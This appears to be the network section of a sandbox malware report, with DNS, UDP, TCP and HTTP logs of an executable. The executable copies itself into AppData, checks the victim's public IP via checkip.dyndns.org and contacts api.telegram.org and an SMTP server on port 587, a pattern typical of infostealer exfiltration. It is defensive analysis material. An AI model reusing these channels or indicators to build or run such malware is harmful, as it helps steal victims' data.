                                                                              Oct 7, 2024 08:51:42.319788933 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.319825888 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.319892883 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.319935083 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.319993973 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.320190907 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.531244993 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:51:42.584075928 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:53:17.051337004 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:53:17.056251049 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:53:17.402337074 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:53:17.402496099 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:53:17.402513027 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:53:17.403050900 CEST50126587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:53:17.407324076 CEST5875012668.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:53:20.861694098 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:53:20.866548061 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:53:21.214482069 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:53:21.214680910 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:53:21.217129946 CEST5875012768.66.224.41192.168.2.4
                                                                              Oct 7, 2024 08:53:21.217365980 CEST50127587192.168.2.468.66.224.41
                                                                              Oct 7, 2024 08:53:21.220766068 CEST5875012768.66.224.41192.168.2.4

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 7, 2024 08:51:18.679948092 CEST5576853192.168.2.41.1.1.1
                                                                              Oct 7, 2024 08:51:18.686897993 CEST53557681.1.1.1192.168.2.4
                                                                              Oct 7, 2024 08:51:19.673316956 CEST4980453192.168.2.41.1.1.1
                                                                              Oct 7, 2024 08:51:19.684209108 CEST53498041.1.1.1192.168.2.4
                                                                              Oct 7, 2024 08:51:30.584717989 CEST5954353192.168.2.41.1.1.1
                                                                              Oct 7, 2024 08:51:30.591342926 CEST53595431.1.1.1192.168.2.4
                                                                              Oct 7, 2024 08:51:35.041230917 CEST53548481.1.1.1192.168.2.4
                                                                              Oct 7, 2024 08:51:37.025908947 CEST6277253192.168.2.41.1.1.1
                                                                              Oct 7, 2024 08:51:37.126096010 CEST53627721.1.1.1192.168.2.4
                                                                              Oct 7, 2024 08:51:48.602760077 CEST5358129162.159.36.2192.168.2.4
                                                                              Oct 7, 2024 08:51:49.086297035 CEST5272953192.168.2.41.1.1.1
                                                                              Oct 7, 2024 08:51:49.093627930 CEST53527291.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 7, 2024 08:51:18.679948092 CEST192.168.2.41.1.1.10xe465Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:19.673316956 CEST192.168.2.41.1.1.10x532bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:30.584717989 CEST192.168.2.41.1.1.10xdf33Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:37.025908947 CEST192.168.2.41.1.1.10xdd64Standard query (0)mail.precioustouchfoundation.orgA (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:49.086297035 CEST192.168.2.41.1.1.10x5b9cStandard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 7, 2024 08:51:18.686897993 CEST1.1.1.1192.168.2.40xe465No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:18.686897993 CEST1.1.1.1192.168.2.40xe465No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:18.686897993 CEST1.1.1.1192.168.2.40xe465No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:18.686897993 CEST1.1.1.1192.168.2.40xe465No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:18.686897993 CEST1.1.1.1192.168.2.40xe465No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:18.686897993 CEST1.1.1.1192.168.2.40xe465No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:19.684209108 CEST1.1.1.1192.168.2.40x532bNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:19.684209108 CEST1.1.1.1192.168.2.40x532bNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:30.591342926 CEST1.1.1.1192.168.2.40xdf33No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:37.126096010 CEST1.1.1.1192.168.2.40xdd64No error (0)mail.precioustouchfoundation.orgprecioustouchfoundation.orgCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:37.126096010 CEST1.1.1.1192.168.2.40xdd64No error (0)precioustouchfoundation.org68.66.224.41A (IP address)IN (0x0001)false
                                                                              Oct 7, 2024 08:51:49.093627930 CEST1.1.1.1192.168.2.40x5b9cName error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • reallyfreegeoip.org
                                                                              • api.telegram.org
                                                                              • checkip.dyndns.org

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449733132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:18.699125051 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:19.363337994 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:19 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 77408518965d6b190097321807d054b6
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 7, 2024 08:51:19.387669086 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 7, 2024 08:51:19.601515055 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:19 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 87e3e100ad7138cc7f1ef75ab6634c9c
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 7, 2024 08:51:20.480240107 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 7, 2024 08:51:20.684520006 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:20 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: f48e9ea71ca5a149a623997bee69bbd7
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 7, 2024 08:51:20.903207064 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:20 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: f48e9ea71ca5a149a623997bee69bbd7
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449737132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:21.307543993 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 7, 2024 08:51:21.989424944 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:21 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 674255d4b76e2f902ea10fc12df77ce3
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449740132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:22.785193920 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:23.468280077 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: e16a36954ea923578944a5f88ac065cf
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449741132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:23.057079077 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:23.730097055 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 05d642a106458fcac83bc4c9ddc288cd
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 7, 2024 08:51:23.733705044 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 7, 2024 08:51:23.939752102 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 436947aa0530340a4885d9558eeeb7f2
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 7, 2024 08:51:24.627157927 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 7, 2024 08:51:24.833192110 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:24 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 7f1f972bbb670fa5a2b17f6b3f35188d
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449744132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:24.122538090 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:24.809830904 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:24 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 56c0c1a8d9273e43c7814d3c62d6c011
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449747132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:25.427826881 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:26.099988937 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:26 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 47a4c0bdd5a814f92f10cd1f676aae29
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449748132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:25.465378046 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 7, 2024 08:51:26.119807005 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:26 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 201daa14d8e80b5a7c87eee60caf3fca
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449751132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:26.690434933 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:27.355006933 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: ab2537e286ccff56a380bbe4ec0e4e6f
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.449752132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:26.725182056 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 7, 2024 08:51:27.388710022 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 02a6870dee50d87f5b8f980e44a60e75
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.449755132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:27.956156969 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:28.621740103 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:28 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 31c5606c0baaaa4a554d6a47fa209f5a
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.449756132.226.247.73807540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:27.986356974 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:28.650738955 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:28 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: d040290ec4039214c8152c4cfa4b0dae
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.449759132.226.247.73807180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 7, 2024 08:51:29.232044935 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 7, 2024 08:51:29.924650908 CEST320INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 35b423fc763e9734096cb7d377ec88a6
